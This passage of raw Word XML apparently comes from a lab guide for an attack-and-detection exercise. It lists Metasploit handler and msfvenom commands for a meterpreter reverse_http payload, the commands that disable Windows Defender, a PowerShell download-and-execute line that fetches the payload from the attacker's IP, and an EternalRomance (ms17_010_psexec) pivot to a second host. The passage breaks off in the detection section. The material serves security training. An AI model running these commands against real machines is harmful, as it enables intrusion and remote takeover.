    <w:p w14:paraId="3252DBA9" w14:textId="2954703D" w:rsidR="000610C0" w:rsidRDefault="000610C0" w:rsidP="000610C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Browse to the IP of the attacker station on a web browser on the target machine to validate and finish this step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C644E16" w14:textId="61F87C64" w:rsidR="000610C0" w:rsidRDefault="00BE7FC1" w:rsidP="00146555">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE7FC1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C8F49A" wp14:editId="4219574D">
            <wp:extent cx="1924050" cy="940024"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2020195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95524" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1938887" cy="947273"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1680FBBC" w14:textId="77777777" w:rsidR="00BE7FC1" w:rsidRDefault="00BE7FC1" w:rsidP="000610C0"/>
    <w:p w14:paraId="28811C38" w14:textId="07DE42BF" w:rsidR="004F645E" w:rsidRPr="00D6171B" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6171B">
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
        </w:rPr>
        <w:t>Pastables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B033088" w14:textId="77777777" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E67131" w14:textId="77777777" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0B09C3" w14:textId="77777777" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:r>
        <w:t>set payload windows/x64/meterpreter/reverse_http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439CD7F7" w14:textId="77777777" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:r>
        <w:t>set LHOST X.X.X.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A51BB50" w14:textId="77777777" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:r>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B2488" w14:textId="77777777" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6522AA" w14:textId="77777777" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:r>
        <w:t>show advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1880126B" w14:textId="18A5D88A" w:rsidR="00BE7FC1" w:rsidRDefault="00BE7FC1" w:rsidP="00D6171B">
      <w:r>
        <w:t>run -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DE682" w14:textId="11E83E20" w:rsidR="00982963" w:rsidRDefault="00982963" w:rsidP="00D6171B">
      <w:r>
        <w:t>jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435CE8D0" w14:textId="77777777" w:rsidR="00BE7FC1" w:rsidRDefault="00BE7FC1" w:rsidP="00BE7FC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5C5DA9" w14:textId="77777777" w:rsidR="00BE7FC1" w:rsidRDefault="00BE7FC1" w:rsidP="00BE7FC1">
      <w:r>
        <w:t>cd up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CDA13E" w14:textId="77777777" w:rsidR="00D50ED9" w:rsidRDefault="00D50ED9" w:rsidP="00D50ED9">
      <w:r w:rsidRPr="00231ABD">
        <w:t>msfvenom -</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00231ABD">
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ayload</w:t>
      </w:r>
      <w:r w:rsidRPr="00231ABD">
        <w:t xml:space="preserve"> windows/x64/meterpreter/reverse_http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LHOST=X.X.X.X LPORT=4444 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psh-cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o initial.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B06916D" w14:textId="541A76C3" w:rsidR="00D50ED9" w:rsidRDefault="00D50ED9" w:rsidP="005F0194">
      <w:r w:rsidRPr="005F0194">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sed </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F0194">
        <w:t>'s/%COMSPEC% \/b \/c start \/b \/min //g' initial.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6130D20F" w14:textId="53ADF846" w:rsidR="00BE7FC1" w:rsidRDefault="00D50ED9" w:rsidP="00BE7FC1">
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00BE7FC1">
        <w:t xml:space="preserve">ython -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BE7FC1">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BE7FC1">
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65318F9A" w14:textId="77777777" w:rsidR="005E0DCD" w:rsidRPr="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="005E0DCD"/>
    <w:p w14:paraId="4C770C35" w14:textId="01BAC82F" w:rsidR="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="0093284B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:after="200"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Execute implant on target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15FCCB" w14:textId="77777777" w:rsidR="00BE7FC1" w:rsidRDefault="00BE7FC1" w:rsidP="005E0DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The first issue you’ll run into is Windows Defender eating up your generic and well documented payloads. Ensure that Defender is disabled by entering the following in an elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prompt:</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DB50EE4" w14:textId="58E53458" w:rsidR="00BE7FC1" w:rsidRDefault="00BE7FC1" w:rsidP="00BE7FC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t>get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t>mppreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t>disablerealtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0311D1B0" w14:textId="6F8B2EF2" w:rsidR="00BE7FC1" w:rsidRDefault="00BE7FC1" w:rsidP="00BE7FC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: This should read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>True, if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Defender is disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE2758B" w14:textId="535B412A" w:rsidR="00BE7FC1" w:rsidRDefault="00BE7FC1" w:rsidP="00BE7FC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MpPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DisableRealTimeMonitoring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A7592" w14:textId="74337899" w:rsidR="00D50ED9" w:rsidRDefault="00D50ED9" w:rsidP="00D50ED9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> you’ll run an elevated command prompt to execute a download and execute of your payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B603DE" w14:textId="77777777" w:rsidR="00146555" w:rsidRDefault="00146555" w:rsidP="00146555">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t xml:space="preserve"> -c "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t>iex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7FC1">
        <w:t xml:space="preserve"> ((New-Object Net.Webclient).Downloadstring('http://192.168.138.130/initial.ps1'))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263B016" w14:textId="257E41C3" w:rsidR="00146555" w:rsidRDefault="00146555" w:rsidP="00146555">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You should now check your attacker workstation and verify a session has been established as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D369803" w14:textId="44AFE7BC" w:rsidR="00146555" w:rsidRDefault="00146555" w:rsidP="00146555">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00146555">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B59EBD1" wp14:editId="5C0B8612">
            <wp:extent cx="6858000" cy="1710055"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="135017065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70651" name="Picture 1" descr="A computer screen with text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1710055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5B9B3" w14:textId="591495BD" w:rsidR="00146555" w:rsidRDefault="00146555" w:rsidP="00146555">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attempt to run basic commands to ensure privileges, target, and user context as well as to create some artifacts to find later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C4CD2" w14:textId="0A275A66" w:rsidR="00146555" w:rsidRDefault="00146555" w:rsidP="00146555">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A3EDBC" w14:textId="14A52555" w:rsidR="00146555" w:rsidRDefault="00146555" w:rsidP="00146555">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A3A8BF7" w14:textId="5081EB28" w:rsidR="00146555" w:rsidRDefault="00146555" w:rsidP="00146555">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659B8417" w14:textId="190E4AD0" w:rsidR="00146555" w:rsidRDefault="00146555" w:rsidP="009D3344">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00146555">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="351A336B" wp14:editId="241D04B9">
            <wp:extent cx="2257425" cy="1261190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98631402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4020" name="Picture 1" descr="A computer screen shot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2265448" cy="1265672"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE3E370" w14:textId="77777777" w:rsidR="009D3344" w:rsidRDefault="009D3344" w:rsidP="009D3344"/>
    <w:p w14:paraId="7B0121E6" w14:textId="77777777" w:rsidR="009D3344" w:rsidRDefault="009D3344" w:rsidP="009D3344"/>
    <w:p w14:paraId="3FF698F6" w14:textId="77777777" w:rsidR="00BE7FC1" w:rsidRDefault="00BE7FC1" w:rsidP="005E0DCD"/>
    <w:p w14:paraId="01A254C9" w14:textId="3BCA3BE5" w:rsidR="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="00D31D21">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:after="200"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Pivot to another target via eternalromance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410689C6" w14:textId="7EB048AD" w:rsidR="005E0DCD" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add a route to pivot to our next target through the already established session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06439265" w14:textId="32D525D2" w:rsidR="002D63AF" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>route add X.X.X.0 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F925431" w14:textId="4C44DFCB" w:rsidR="002D63AF" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Note: The 2 values are the subnet to route to and the session to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D1D182" w14:textId="01C889C3" w:rsidR="002D63AF" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002D63AF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0559A93A" wp14:editId="5BBDD011">
            <wp:extent cx="4363059" cy="295316"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="143514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46698" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4363059" cy="295316"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14784092" w14:textId="0A8A57E2" w:rsidR="002D63AF" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Next configure ms17_010 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EternalRomance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) to exploit the next target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD1665" w14:textId="2D1168D9" w:rsidR="002D63AF" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ms17_010_psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403DD889" w14:textId="06FC7C53" w:rsidR="002D63AF" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS X.X.X.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080EA86E" w14:textId="2256562C" w:rsidR="002D63AF" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D70880" w14:textId="174CF846" w:rsidR="002D63AF" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: Running this module without </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is effectively running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EternalRomance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, however if credentials are provided this will be a standard </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PSExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF49EEB" w14:textId="77777777" w:rsidR="002D63AF" w:rsidRDefault="002D63AF" w:rsidP="002D63AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A981D4" w14:textId="7E7D4FA3" w:rsidR="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="00F56976">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:after="200"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Establish Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B966F3D" w14:textId="77777777" w:rsidR="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="005E0DCD"/>
    <w:p w14:paraId="6E2D716C" w14:textId="48F173BF" w:rsidR="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="00350E2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:after="200"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Steal credentials and Access network resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5754B12A" w14:textId="77777777" w:rsidR="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="005E0DCD"/>
    <w:p w14:paraId="615AAEB3" w14:textId="6CFE1C3B" w:rsidR="005E0DCD" w:rsidRPr="004328C6" w:rsidRDefault="005E0DCD" w:rsidP="005E0DCD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004328C6">
        <w:t>Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73023119" w14:textId="4B350760" w:rsidR="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="005E0DCD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Access Client1 via psremoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5690A673" w14:textId="6E202F59" w:rsidR="00F32801" w:rsidRDefault="009D3344" w:rsidP="00F32801">
      <w:r>
        <w:t xml:space="preserve">Ensure that hosts are added into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>each others</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> trusted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hosts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r w:rsidR="00EC64A2">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC9314" w14:textId="106FCF9E" w:rsidR="00EC64A2" w:rsidRDefault="00EC64A2" w:rsidP="00EC64A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set-Item </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WSMan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:\localhost\Client\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrustedHosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -value “X.X.X.X” -Concatenate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E37E3" w14:textId="1D353228" w:rsidR="00EC64A2" w:rsidRPr="00F32801" w:rsidRDefault="00EC64A2" w:rsidP="00EC64A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get-Item </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WSMan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:\localhost\Client\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrustedHosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CF87B80" w14:textId="1BE49F13" w:rsidR="005E0DCD" w:rsidRDefault="00F32801" w:rsidP="005E0DCD">
      <w:pPr>
